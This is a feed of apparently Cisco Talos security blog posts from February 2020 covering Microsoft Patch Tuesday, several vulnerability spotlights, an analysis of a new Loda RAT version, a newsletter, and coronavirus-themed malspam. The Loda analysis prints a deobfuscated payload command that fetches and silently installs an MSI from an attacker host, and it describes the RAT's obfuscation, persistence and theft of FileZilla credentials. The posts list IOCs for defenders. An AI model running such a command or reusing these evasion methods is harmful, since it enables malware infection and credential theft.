Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity.

This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Procol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player.

Talos released a new set of SNORTⓇ rules today that provide coverage for some of these vulnerabilities, which you can see here.

Critical vulnerabilities

Microsoft disclosed 12 critical vulnerabilities this month, all of which we will highlight below.

CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713 and CVE-2020-0767 are all memory corruption vulnerabilities in the Microsoft scripting engine that deals with how Internet Explorer handles objects in memory. An attacker could use these vulnerabilities to corrupt memory on the victim machine in a way that would allow them to execute arbitrary code. A user could trigger this bug by visiting an attacker-controlled web page on Internet Explorer that's been specially crafted to exploit this vulnerability. Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" in another application or Microsoft Office document that utilizes the Internet Explorer rendering engine and convince the victim to open that file.

CVE-2020-0681 and CVE-2020-0734 are remote code execution vulnerabilities in Remote Desktop Protocol when the user connects to a malicious server. An attacker can exploit these vulnerabilities by hosting a server, and convincing a user to connect to it, likely via social engineering or a man-in-the-middle technique.

CVE-2020-0662 is a remote code execution vulnerability in Windows 10 and some versions of Windows Server that exists in the way the software handles objects in memory. If successfully exploited, this vulnerability could allow an attacker to execute arbitrary code with elevated permissions on the victim machine. The attacker would need a domain user account, and then create a specially crafted request.

CVE-2020-0729 is a remote code execution vulnerability in Windows that could allow an attacker to remotely execute code if Windows processes a specially crafted .LNK file. An adversary could exploit this vulnerability by sending the user a removable drive or remote share containing a malicious .LNK file and an associated malicious binary. If the user opens the file in Windows Explorer or another application that parses .LNK files, the binary will execute code of the attacker's choice.

CVE-2020-0738 is a memory corruption vulnerability in Windows Media Foundation that exists in the way the software handles objects in memory. An attacker could exploit this bug by convincing the user to open a specially crafted, malicious file or web page, which would corrupt memory in a way the attacker could then install programs, manipulate user data or create new user accounts on the victim machine.

Important vulnerabilities

This release also contains 84 important vulnerabilities:

• CVE-2020-0618
• CVE-2020-0655
• CVE-2020-0657
• CVE-2020-0658
• CVE-2020-0659
• CVE-2020-0660
• CVE-2020-0661
• CVE-2020-0663
• CVE-2020-0665
• CVE-2020-0666
• CVE-2020-0667
• CVE-2020-0668
• CVE-2020-0669
• CVE-2020-0670
• CVE-2020-0671
• CVE-2020-0672
• CVE-2020-0675
• CVE-2020-0676
• CVE-2020-0677
• CVE-2020-0678
• CVE-2020-0679
• CVE-2020-0680
• CVE-2020-0682
• CVE-2020-0683
• CVE-2020-0685
• CVE-2020-0686
• CVE-2020-0688
• CVE-2020-0689
• CVE-2020-0691
• CVE-2020-0692
• CVE-2020-0694
• CVE-2020-0695
• CVE-2020-0696
• CVE-2020-0697
• CVE-2020-0698
• CVE-2020-0701
• CVE-2020-0703
• CVE-2020-0704
• CVE-2020-0705
• CVE-2020-0706
• CVE-2020-0707
• CVE-2020-0708
• CVE-2020-0709
• CVE-2020-0714
• CVE-2020-0715
• CVE-2020-0716
• CVE-2020-0717
• CVE-2020-0719
• CVE-2020-0720
• CVE-2020-0721
• CVE-2020-0722
• CVE-2020-0723
• CVE-2020-0724
• CVE-2020-0725
• CVE-2020-0726
• CVE-2020-0727
• CVE-2020-0728
• CVE-2020-0730
• CVE-2020-0731
• CVE-2020-0732
• CVE-2020-0733
• CVE-2020-0735
• CVE-2020-0736
• CVE-2020-0737
• CVE-2020-0739
• CVE-2020-0740
• CVE-2020-0741
• CVE-2020-0742
• CVE-2020-0743
• CVE-2020-0744
• CVE-2020-0745
• CVE-2020-0746
• CVE-2020-0747
• CVE-2020-0748
• CVE-2020-0749
• CVE-2020-0750
• CVE-2020-0751
• CVE-2020-0752
• CVE-2020-0753
• CVE-2020-0754
• CVE-2020-0755
• CVE-2020-0756
• CVE-2020-0759
• CVE-2020-0766

Other vulnerabilities

There are two other vulnerabilities, CVE-2020-0693 and CVE-2020-0702, for which Microsoft did not assign a severity.

Coverage 

In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

These rules are:  48701, 48702, 53050 - 53056, 53061, 53072, 53073, 53079 - 53089

Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel

February 11, 2020, 11:31 am

≫ Next: Vulnerability Spotlight: Code execution vulnerability in Microsoft Media Foundation

≪ Previous: Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage

$

0

0

Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Microsoft Excel contains a code execution vulnerability. This specific bug lies in the component of Excel that handles the Microsoft Office HTML and XML file types, first introduced in Office 2000. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Microsoft Office Excel Ordinal43 code execution vulnerability (TALOS-2019-0968/CVE-2020-0759)

An exploitable use-after-free vulnerability exists in Excel in Microsoft Office Professional Plus 2016 x86, version 1909, build 12026.20334 and Microsoft Office 365 ProPlus x86, version 1902, build 11328.20480. A specially crafted XLS file can cause a use after free condition, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects Microsoft Office Professional Plus 2016 x86, version 1909, build 12026.20334 and Microsoft Office 365 ProPlus x86, version 1902, build 11328.20480.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52417, 52418

Vulnerability Spotlight: Code execution vulnerability in Microsoft Media Foundation

February 11, 2020, 11:31 am

≫ Next: Vulnerability Spotlight: Use-after-free vulnerability in Windows 10 win32kbase

≪ Previous: Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel

$

0

0

Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Microsoft Media Foundation’s framework contains a code execution vulnerability. This specific bug lies in Media Foundations’ MPEG4 DLL. An attacker could provide a user with a specially crafted ASF file to exploit this vulnerability. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Microsoft Media Foundation IMFASFSplitter::Initialize code execution vulnerability (TALOS-2019-0946/CVE-2020-0738)

An exploitable type confusion vulnerability exists in the mfasfsrcsnk.dll of Microsoft Media Foundation 10.0.18362.207. A specially crafted ASF file can cause type confusion, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects the 32-and 64-bit versions of Windows 10 Media Foundation ASF Source and Sink DLL, version 10.0.18362.207 (WinBuild.160101.0800).

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52095, 52096

---

Vulnerability Spotlight: Use-after-free vulnerability in Windows 10 win32kbase

February 11, 2020, 11:51 am

≫ Next: Vulnerability Spotlight: Remote code execution vulnerability in Apple Safari

≪ Previous: Vulnerability Spotlight: Code execution vulnerability in Microsoft Media Foundation

$

0

0

Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos is releasing the details of a use-after-free vulnerability in Windows 10. An attacker could exploit this vulnerability to gain the ability to execute arbitrary code in the kernel context. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Windows 10 win32kbase HMMarkObjectDestroy arbitrary code execution vulnerability (TALOS-2019-0970/CVE-2020-0731)

A use after free vulnerability exists in Windows 10, Version 10.0.19033.1, when a Win32k component fails to properly handle objects in memory. Successful exploitation of this vulnerability can lead to arbitrary code execution in the kernel context and elevation of privileges. This vulnerability occurs only on an x86 machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects Microsoft Windows 10, version 10.0.19033.1, Insider Preview Fast running on an x86 machine.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52432, 52433

Vulnerability Spotlight: Remote code execution vulnerability in Apple Safari

February 12, 2020, 5:44 am

≫ Next: Loda RAT Grows Up

≪ Previous: Vulnerability Spotlight: Use-after-free vulnerability in Windows 10 win32kbase

$

0

0

Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Apple Safari web browser contains a remote code execution vulnerability in its Fonts feature. If a user were to open a malicious web page in Safari, they could trigger a type confusion, resulting in

memory corruption and possibly arbitrary code execution. An attacker would need to trick the user into visiting the web page by some means to trigger this vulnerability.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Apple to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Apple Safari FontFaceSet remote code execution vulnerability (TALOS-2019-0967/CVE-2020-3868)

A type confusion vulnerability exists in the Fonts feature of Apple Safari, version 13.0.3. A specially crafted HTML web page can cause a type confusion, resulting in memory corruption and possibly arbitrary code execution. To trigger this vulnerability, the target application needs to process a specially crafted HTML web page.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects Safari, version 13.0.3 (15608.3.10.1.4); Safari technology preview release 96 (Safari 13.1, WebKit 15609.1.9.7) and Webkit GIT e4cd3b4fab6166d1288984ded40c588439dab925.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52415, 52416

Loda RAT Grows Up

February 12, 2020, 12:08 pm

≫ Next: Threat Source newsletter (Feb. 13, 2020)

≪ Previous: Vulnerability Spotlight: Remote code execution vulnerability in Apple Safari

$

0

0

By Chris Neal.

• Over the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting a new version of Loda, a remote access trojan (RAT) written in AutoIT.
• These websites also host malicious documents that begin a multi-stage infection chain which ultimately serves a malicious MSI file. The second stage document exploits CVE-2017-11882 to download and run the MSI file, which contains Loda version 1.1.1.
• This campaign appears to be targeting countries in South America and Central America, as well as the U.S.

What's New?

Talos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT script changed to a different form of string encoding. Multiple persistence mechanisms have been employed to ensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to enumerate antivirus solutions running on the infected host.

How Did it Work?

The Loda sample analyzed in this post is delivered via a document chain. The first contains an OOXML relationship to a second document that contains an exploit. Once the exploit is triggered, an MSI file that contains the Loda RAT is downloaded to the target host and executed. While the main purpose of this RAT is to steal usernames, passwords, and cookies saved within browsers, it also has keylogging, sound recording, screenshotting and the ability to allow the threat actor to send messages to the infected host.

So What?

Loda is a simple, yet effective, RAT that has matured over time. This RAT is a good example of how effective relatively simple techniques combined with basic obfuscation can be. The techniques this malware employs are of fairly low complexity and show that slight changes in implementation can significantly reduce detection rates.

The Campaign

Telemetry from Cisco Umbrella shows that this campaign is quite active and seems to be targeting countries in South America, Central America and the U.S. The majority of the queries to the C2 domain "4success[.]zapto[.]org" originate from Brazil, Costa Rica and the United States. Similarly, the queries to "success20[.]hopto[.]org" originate from Argentina, Brazil and the United States. Our telemetry also shows that C2 communications go as far back as the last quarter of 2019.

DNS queries to 4success[.]zapto[.]org

DNS queries to success20[.]hopto[.]org

Infection chain

At the time of analysis, several steps of the infection chain had a relatively low detection rate due to various obfuscation techniques. The initial document is delivered via a phishing email that contains the first-stage document as an attachment.

Example of an email from this campaign

The first document in the infection chain, titled in one instance "comprobante de confirmación de pago.docx" contains an OOXML relationship, located in "/word/_rels" that points to a second document at "http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc". Aside from this OOXML relationship, the initial document isn't particularly noteworthy. The document uses this two-stage document technique to bypass some email filters.

OOXML Relationship

The second document is a Rich Text Format document that contains a payload within an obfuscated OLE object which is then executed by exploiting CVE-2017-11882, an arbitrary code execution vulnerability in some versions of Microsoft Office. The contents of the Author field, "obidah qudah" in the metadata of this document appears to be constant across all samples analyzed during the investigation.

When we looked deeper into this author's name, we discovered they have a relatively long history of being associated with malicious RTF documents. Starting in 2017, there have been just under 1,300 malicious documents submitted to VirusTotal that contain "obidah qudah" in the author field. An overwhelming majority of these submissions are RTF documents that exploit CVE-2017-11882.

However, the "Last Modified By" field is not static throughout these documents. There appear to be multiple campaigns over the last few years, starting in 2017, that use the "obidah qudah" author name, with each campaign using a different "Last Modified By" field, with many serving malware other than Loda. It is unclear whether these campaigns were initiated by the same threat actor, or if a single malicious RTF document builder was used by multiple different actors. In the documents analyzed in this post, the "Last Modified By" value is set to "Richard."

Author labeled as "obidah qudah"

The OLE object within this document that contains the exploit and payload employs an interesting obfuscation technique that utilizes RTF control words.

Obfuscated payload

The control word "\par" used in the object indicates the end of a paragraph, while the "\*" has a slightly more complex function. The "\*" control word instructs an RTF reader to ignore the following control words only if they are not understood by the reader, which allows the author to include false control words (ex: \par67234). Using this technique to break up the OLE object not only obfuscates the payload but also does not allow RTF parsers to read the object in its entirety. Once it is executed, the control words will be ignored, concatenating the bytes in between into the exploit payload as shown below.

Deobfuscated payload

Within this payload, the command "cmd.exe & /C CD C: & msiexec.exe /i http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi /quiet" can be seen. Once the exploit is triggered, a malicious MSI file is then downloaded and executed.

This MSI was created using Exe2Msi, a common tool used to repackage Windows executables as an MSI file. Although this tool is most often used with legitimate software, it is also frequently used by malware authors. One of the benefits of delivering malware in an MSI package is that it provides a lower detection rate. Simply repackaging a malicious executable as an MSI file can reduce detection rates with very little effort. If repackaged as an MSI, the detection rate of a malicious executable can drop by up to 50 percent on VirusTotal. Combined with other forms of obfuscation, this can result in a crude, yet effective, means of evasion.

The malware

At execution, "fkrkdn.msi" extracts an executable at "C:\Users\<user>\AppData\Roaming\Windata\JLMWFF.exe." This is the Loda 1.1.1 binary, which is a compiled AutoIT script. A detailed write-up by Proofpoint on a previous version of Loda and its functionality can be found here.

The initial C2 beacon was captured from "JLMWFF.exe" which contained the unique signature "ZeXro0" repeated several times, which is not present in other versions of Loda. The C2 comms pointed to "4success[.]zapto[.]org" contain information about the infected host, including OS version, architecture and username. This also reveals that this version of Loda is "1.1.1." Aside from the unique signature, this beacon format is the same as previous versions.

Even though this new version of Loda has nearly identical functionality as previous versions, there are significant differences in implementation and design. Some of the functions within the script have been completely rewritten, with the most readily apparent change being the obfuscation technique used. In version 1.1.1, almost every string or variable is obfuscated using the simple encoding algorithm shown below.

Loda's encoding algorithm

There are a few key changes in functionality in version 1.1.1. To detect what antivirus software is running on the host, earlier versions of Loda would call the AutoIT function PROCESSEXISTS() for each antivirus software process name. Loda 1.1.1 now makes a WMI query to "winmgmts:\\localhost\root\SecurityCenter2" to enumerate installed antivirus solutions, as shown below in the deobfuscated code:

AV enumeration function

For persistence, the new version now adds both a registry key and a scheduled task:

Persistence mechanism

A new capability this version has is the ability to read the contents of "\filezilla\recentservers.xml". This document contains the IP addresses, usernames and passwords of servers that Filezilla has recently connected to. It is important to note that these passwords are stored in either plaintext or encoded in base64.

One interesting functionality that persists through the versions of Loda is the command "QURAN". This command streams music from "live.mp3quran[.]net:9976" in Windows Media Player using the Microsoft Media Server (MMS) protocol. MMS is a deprecated Microsoft proprietary network streaming protocol used to stream media in Windows Media Player.

"QURAN" command function

There is no other functionality to this command other than playing the music that is streaming at this URL to the infected host.

Conclusion

Although the functionality of this new version of Loda is similar to previous versions, this new iteration is a slightly more well-developed RAT. Loda is simple yet has proven to be effective, and poses a serious threat to an infected host. The credential stealing capabilities could lead to significant financial loss or a potential data breach. By changing the obfuscation techniques the threat actor was able to lower the detection rate considerably. The change in persistence mechanisms and AV solution detection show that the malware authors are actively improving the functionality of Loda.

Coverage

Snort

[SID] 53031

ClamAV

Win.Packed.LokiBot-6963314-0
Doc.Exploit.Cve_2017_11882-7570663-1
Doc.Downloader.Loda-7570590-0

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs:

http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc
http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi
http://lcodigo[.]com/apiW/config/uploads/tmp/kctlqz.msi
http://drinkfoodapp[.]com/AdminDF/assets/img/app/settings.doc
http://drinkfoodapp.com/AdminDF/assets/img/app/grcfne.msi
http://yewonder[.]com/wp-content/plugins/ltfhmam/eklnxx.msi
https://www[.]miracleworkstudios[.]com/wp-content/uploads/2019/12/app/updates.doc
http://wp[.]168gamer[.]com/secured/mcsonb.msi
http://wp[.]168gamer[.]com/secured/office.doc

Docs:

b5df816986a73e890f41ff0c0470a2208df523f17eb4eac9c5f0546da2ec161e
af42191fe2ea328080939ec656302a8f364dac44b5cd8277dcbaeb15ff499178
36865059f1c142ba1846591aae8d78d8a109a0dc327a88547e41e3663bad2eaf e15336491ab57a16a870edd5b135014b62387cb45e4e490b9d4091c54394dec4

MSI:

9edd2bfdb0c177f046cec1392d31ee3f67174e0a23fdf7e4b6fd580e769f0493
8b989db4a9f8c3f0fa825cca35386ac4be4e33fd2ea53a118d4f4dd8259aeccc
633f3970c31c9cb849bd5f66c3a783538bb2327b4bec5774b870f8b3b53ea3c1
C65668958c5dfeccb40abd0771c17d045f24c78f51ea6c3955e110f53ad8eece
740a5c19645d5a90fc1e11c84f5d6a058dc50206337aa37bbc783bd54ba84a79
6cb47f2ecd58349ffe65d7ea281eea2ebd231bbaac30843f872ae2249bd140b0

C2:

4success[.]zapto[.]org
success20[.]hopto[.]org
breakthrough[.]hopto[.]org

Threat Source newsletter (Feb. 13, 2020)

February 13, 2020, 11:00 am

≫ Next: Threat actors attempt to capitalize on coronavirus outbreak

≪ Previous: Loda RAT Grows Up

$

0

0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

This month’s Microsoft Patch Tuesday was particularly hefty, with the company disclosing nearly 100 vulnerabilities — three of which Talos researchers discovered. For our complete wrapup, check out the blog post here, and be sure to update your Microsoft products now if you haven’t already.

Over on our YouTube page, we have a new video series we’re debuting called “Stories from the Field” with the Cisco Talos Incident Response Team. In each video, one of our team members will discuss one incident they remember working on and what lessons they took away from it, and what other defenders can learn.

On the research side of things, we have new findings out about a variant of the Loda RAT. We recently discovered that this malware family added several anti-detection features and is targeting victims across the Americas. 

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

Upcoming public engagements

Event: Cisco Live Australia 
Location: Melbourne Convention & Exhibition Centre, Melbourne, Australia
Date: March 3 - 6
Speakers: Nick Biasini
Synopsis: Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. People responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In Nick's talk at Cisco Live, he will perform a deep analysis of recent threats and show how Talos leverages large datasets to deliver product improvements and mitigation strategies.

Event: “Everyone's Advanced Now: The evolution of actors on the threat landscape” at Interop Tokyo 2020
Location: Makuhari Messe, Tokyo, Japan
Date: April 13 - 15
Speakers: Nick Biasini
Synopsis: In the past, there were two clear classes of adversary an enterprise would face: sophisticated and basic. These basic threats were commodity infections that would require simple triage and remediation. Today, these commodity infections can quickly turn into enterprise-crippling ransomware attacks, costing organizations millions of dollars to recover. Now more than ever, organizations need every advantage they can get — and threat intelligence is a big part of it. Having visibility into your own environment and attacks around the globe are equally vital to success. This talk will cover these trends and show how the gap between the sophisticated and the basic adversary is quickly disappearing.

Cyber Security Week in Review

• The U.S. charged four members of the Chinese military for their involvement in the massive Equifax data breach. Federal prosecutors allege the men hacked into Equifax’s systems and stole the personal information of nearly half of all Americans. 
• Political pundits, security researchers and government officials are still unpacking the Iowa caucus debacle. While a results-reporting app has been largely to blame, there are several factors that went into a heavy delay of the democratic presidential primary results. 
• One factor that may have been involved is a distributed denial-of-service attack on a phone line used to report election results in Iowa. Members of an online forum started an effort to flood the phone line the day of the election, with Iowa Democratic party officials saying they received "an unusually high volume of inbound phone calls to its caucus hotline." 
• But the app used in Iowa isn’t the only new technology making an appearance in this year’s election. The discourse in Iowa is leading other states’ officials to take a closer look at their election systems and whether they have paper backups in place. 
• A cyber group in the Gaza strip may be behind a new string of attacks on Palestinians. Attackers use politically themed documents and emails to lure victims into clicking on malicious links, eventually installing backdoors on their machines. 
• The xHelper trojan on Android devices can even survive a factory reset of the infected device. Instead, users need to scan for specific files on their device and remove them prior to any resets so that the malware does not come pre-installed. 
• Google says new initiatives for its Play store helped block more than 1.9 billion malware infections in 2019. The company says that new scanning policies and stepped-up privacy rules have cut back on malicious apps. 
• A powerful Republican Senator blocked three new election security bills from being introduced to the full chamber. One of the bills would have outlawed voting machines from being connected to the internet, while another two would increase the level of cooperation between the FBI and local voting officials. 
• Iran says it deflected one of the largest cyber attacks in the country’s history. Researchers found that internet access was restricted to roughly 25 percent of all users in Iran during the attack last week for about an hour. 

Notable recent security issues

Title: 12 critical vulnerabilities fixed in latest Microsoft Patch Tuesday  
Description: Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity. This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Procol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player. 
Snort SIDs: 48701, 48702, 53050 - 53056, 53061, 53072, 53073, 53079 - 53089 

Title: Adobe releases updates for Reader, Flash Player and more  
Description: Adobe disclosed 42 new vulnerabilities this week as part of its monthly security update, 35 of which are considered critical. These updates include Acrobat Reader, Flash Player and other Adobe products. Most notable are two bugs in Flash Player and Adobe Framemaker that could allow an attacker to execute arbitrary code on the victim machine. 
Snort SIDs: 52331, 52332

Most prevalent malware files this week

SHA 256: 1460fd00cb6addf9806a341fee9c5ab0a793762d1d97dca05fa17467c8705af7 
MD5: 88cbadec77cf90357f46a3629b6737e6
Typical Filename: FlashHelperServices.exe
Claimed Product: Flash Helper Services
Detection Name: PUA.Win.File.2144flashplayer::tpd 

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.85B936960F.5A5226262.auto.Talos

SHA 256:97d8ea6cee63296eaf0fa5d97a14898d7cec6fa49fee1bf77c015ca7117a2ba7 
MD5: be52a2a3074a014b163096055df127a0
Typical Filename: xme64-553.exe 
Claimed Product: N/A
Detection Name: Win.Trojan.Coinminer::tpd

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: mf2016341595.exe
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.  

Threat actors attempt to capitalize on coronavirus outbreak

February 13, 2020, 11:20 am

≫ Next: Threat Roundup for February 7 to February 14

≪ Previous: Threat Source newsletter (Feb. 13, 2020)

$

0

0

By Nick Biasini and Edmund Brumaghin.

• Coronavirus is dominating the news and threat actors are taking advantage.
• Cisco Talos has found multiple malware families being distributed with Coronavirus lures and themes. This includes emotet and several RAT variants.

Executive Summary

Using the news to try and increase clicks and drive traffic is nothing new for malicious actors. We commonly see actors leveraging current news stories or events to try and increase the likelihood of infection. The biggest news currently is focused on the new virus affecting the world, with a focus on China: the coronavirus. There are countless news articles and email-based marketing campaigns going at full throttle right now, as such, we wanted to take a deeper look at how this is manifesting itself on the threat landscape.

Our investigation had several phases, first looking at the email based campaigns then pivoting into open-source intelligence sources for additional samples. These investigations uncovered a series of campaigns from the adversaries behind Emotet, along with a series of other commodity malware families using these same topics as lures, and a couple of odd documents and applications along the way. What was also striking was the amount of legitimate emails containing things like Microsoft Word documents and Excel spreadsheets related to the coronavirus. This really underscores why using these as lures is so attractive to adversaries and why organizations and individuals need to be vigilant when opening mail attachments, regardless of its origins.

What's new? Malware authors and distributors will go through any means necessary to achieve success and generate revenue and this is just the latest example. These lures tied to coronavirus are likely to only increase in volume and variety as the virus continues to spread and dominate the headlines.

How did it work? The majority of these campaigns were driven through email and malspam specifically. These actors would send coronavirus themed emails to potential victims and, in some cases, use filenames related to coronavirus as well, enticing victims to click attachments. One of the reasons this was so effective was the large amount of legitimate email related to coronavirus that also included attachments.

So What?

• Organizations need to realize that attackers are going to use current events to try and get victims to open attachments or click links. You should be prepared and vigilant in identifying these emails and ensuring they don't make it to your users inboxes.
• There is a wide variety of threats represented here so there isn't one single threat to be concerned with, just realize there will likely be a lot more.
• It's not just malicious content, there are a lot of weird executables and other files floating around that are coronavirus-themed and are unwanted, albeit not inherently malicious.

Malspam campaigns

During our analysis of email telemetry, we identified several malicious spam campaigns leveraging news related to coronavirus to entice potential victims to open attachments and initiate various malware infections. Several malware families are currently being distributed via these malspam campaigns including Emotet, Nanocore RAT, and various trojans.

Emotet

Emotet is one of the most prevalent malware families being actively distributed. We have previously analyzed this threat in various posts, notably here and here. Emotet distribution campaigns are commonly observed attempting to integrate current news topics of interest in their distribution campaigns and the current interest in CoronaVirus is no different. It has been previously reported that Emotet has been making use of this theme in various email distribution campaigns, which we have also observed. As previously described, these emails typically contain malicious Microsoft Word documents that function as downloaders for the Emotet malware.

An example of one of the malicious Word documents is below. As usual with these sort of attachments, users are prompted to Enable Editing and Enable Content, granting the attacker the ability to execute code on the endpoint to facilitate the delivery and execution of Emotet, thus infecting the system.

Over the course of the past few weeks, we have observed large quantities of messages featuring this and similar themes being used to spread Emotet to victims.

Nanocore RAT

It is important to note that Emotet is not the only malware family currently being distributed using coronavirus-themed malspam campaigns. We have also observed Nanocore RAT being distributed using similar types of email-based malware distribution campaigns. Nanocore RAT is a remote access trojan (RAT) that is commonly distributed by various threat actors. RATs are one of the more common threats we see delivered on the threat landscape. These malware families typically provide the attacker with remote access into the system and the ability to grab things like keystrokes, files, webcam feeds, and download and execute files. During our investigation we did find a campaign delivering Nanocore, one of these RATs. The campaign was a notification to customers around the status of the coronavirus and the steps they are taking as an organization, as is shown below.

As you can see, the email came with a ZIP file attached, which contained a PIF executable. Once the victim executed the file, Nanocore RAT was installed on the system, giving the adversaries remote access.

Other campaigns

We did find at least one other campaign that was ongoing, but at the time of discovery the command and control (C2) servers were down and final payload retrieval wasn't possible, but the malicious intent was clear. This started like many of the other campaigns with a coronavirus theme.

This particular email was notifying customers of a delay in shipping due to coronavirus and attached a .pdf.ace invoice file. Inside the compressed archive was an executable purporting to be a signed order confirmation. Upon execution, additional data was attempted to be retrieved but due to the server being down, it is not possible to identify the final payload as of the time of publishing.

Additional malware campaigns

In addition to email campaigns leveraging coronavirus, we also analyzed various open-source malware repositories in an attempt to identify additional malware making use of the disease. We discovered several examples of malware that had been submitted to the repositories including adware, wipers, and other various trojans.

Parallax RAT

During our open-source investigation, we came across a sample aptly named "new infected CORONAVIRUS sky 03.02.2020.pif." This file was likely delivered as an attachment to an email in some sort of compressed archive. Upon execution, the RAT is installed and persistence is achieved by creating links in the user's startup folder, as well as the creation of several scheduled tasks, and establishing command and control communications with a dynamic DNS provider domain, which is fairly common with RAT distribution.

Parallax is another RAT not much different from the nanocore campaign we found above. It has the same basic functionality and allows the attacker the ability to upload and download files as well as grab things like keystrokes and screen captures.

Other samples found

